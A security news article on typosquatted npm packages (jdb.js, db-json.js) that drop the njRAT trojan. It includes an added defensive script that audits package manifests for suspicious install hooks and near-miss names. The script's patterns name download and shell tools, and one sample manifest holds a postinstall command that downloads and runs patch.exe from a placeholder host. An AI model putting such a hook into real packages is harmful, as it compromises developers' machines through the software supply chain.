Constant Onslaught of Malicious NPM Packages Bundled With njRAT Malware

According to a Sonatype report, malicious code injection into open-source software (OSS) projects has increased by 430%. Recently, cybercriminals have been seen using two malicious packages, jdb.js and db-json.js, to deliver the njRAT (aka Bladabindi) remote access trojan.

What’s new?

Sonatype security researcher Ax Sharma has found two malicious packages containing a malicious script that executes after web developers import and install either of the two libraries.
  • Both packages described themselves as tools for working with the JSON files typically generated by database applications.
  • The jdb.js package mimics the legitimate Node.js database library jdb, and the db-json.js package mirrors the name of the genuine db-json library.
  • Furthermore, the post-install script of jdb.js attempts to download and run a file named patch.exe, which in turn installs njRAT.
  • Researchers have observed more than 100 downloads of these packages from the npm package registry.
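The two mechanisms described above, an install-time lifecycle script that fetches and runs an executable and a package name that shadows a legitimate one, can both be checked before `npm install` ever runs a script. The following audit is an added example written for this page; it is not code from Sonatype, npm or the article, and the sample manifests it inspects are constructed for illustration rather than the real contents of jdb.js or db-json.js. The list of legitimate names (`jdb`, `db-json`) and the `example.invalid` URL are assumptions used only to drive the demo.

```javascript
// Added example (not from the article, Sonatype or npm): audit package manifests
// before their lifecycle scripts run. It flags
//  (1) preinstall/install/postinstall/prepare scripts that reference executables,
//      remote downloads or shell spawns, the mechanism described for jdb.js, and
//  (2) package names within one edit of a known legitimate name, the mimicry
//      used by jdb.js and db-json.js.
// Run with: node audit.js   (Node >= 14, no dependencies)

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Patterns a defender would not expect in a JSON helper library's install hook.
const SUSPICIOUS = [
  { name: 'windows-executable', re: /\.(exe|dll|scr|bat|cmd)\b/i },
  { name: 'remote-download',    re: /\b(curl|wget|Invoke-WebRequest|iwr|bitsadmin|certutil)\b|https?:\/\//i },
  { name: 'shell-spawn',        re: /\b(powershell|cmd(\.exe)?\s*\/c|sh\s+-c)\b/i },
  { name: 'node-eval',          re: /node\s+-e\b|child_process/ },
];

// Levenshtein distance, used for the near-name (typosquat) check.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,                                   // deletion
        dp[i][j - 1] + 1,                                   // insertion
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1), // substitution
      );
    }
  }
  return dp[a.length][b.length];
}

// Returns the legitimate name this package imitates, or null if it is either
// the genuine package or not close to any known name.
function nearName(name, legitimate) {
  if (legitimate.includes(name)) return null;
  const stripped = name.replace(/\.(js|ts|node)$/, ''); // "jdb.js" -> "jdb"
  for (const known of legitimate) {
    if (stripped === known || editDistance(stripped, known) <= 1) return known;
  }
  return null;
}

// Audits one parsed package.json object; returns a list of findings.
function auditManifest(pkg, legitimate = []) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    for (const { name, re } of SUSPICIOUS) {
      if (re.test(cmd)) findings.push({ package: pkg.name, hook, reason: name, command: cmd });
    }
  }
  const imitated = nearName(pkg.name, legitimate);
  if (imitated) findings.push({ package: pkg.name, hook: null, reason: `near-name:${imitated}`, command: null });
  return findings;
}

// Constructed sample manifests: illustrative only, not the real packages.
const SAMPLES = [
  { name: 'jdb.js', version: '1.0.0',
    scripts: { postinstall: 'node index.js && patch.exe' } },
  { name: 'db-json.js', version: '0.1.2',
    scripts: { postinstall: 'curl -o patch.exe http://example.invalid/patch.exe && patch.exe' } },
  { name: 'left-pad', version: '1.3.0',
    scripts: { test: 'node test.js' } },           // no lifecycle hook: clean
];
const LEGITIMATE = ['jdb', 'db-json'];           // assumed allow-list of genuine names

function auditAll(manifests = SAMPLES, legitimate = LEGITIMATE) {
  return manifests.flatMap((m) => auditManifest(m, legitimate));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditAll()) console.log(JSON.stringify(f));
}
```

In a real pipeline the manifests would come from `npm view <name> scripts` or from the tarball in the registry cache rather than from inline samples, and the allow-list would be the project's vetted dependency set. The blunt mitigation that needs no tooling at all is to stop lifecycle scripts from running during installs, with `npm install --ignore-scripts` or `ignore-scripts=true` in `.npmrc`, and to run the few packages that genuinely need a build step explicitly afterwards.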

Recent NPM malware components

Several other malicious npm components, such as discord.dll, discord.app, wsbd.js and ac-addon, have already made headlines.
  • The most recent CursedGrabber campaign used the xpc.js malware, which targeted Windows hosts to steal Discord tokens and sensitive user data.
  • Earlier, researchers had found two npm packages, discord.dll and twilio-npm, performing nearly the same tasks with slight differences: stealing sensitive files from the Discord application and from browsers.

Wrapping up

The npm team has published a security advisory for these malicious packages. The emergence of counterfeit components suggests that next-generation software supply chain attacks will follow if adequate protections are not in place.

Cyware Publisher
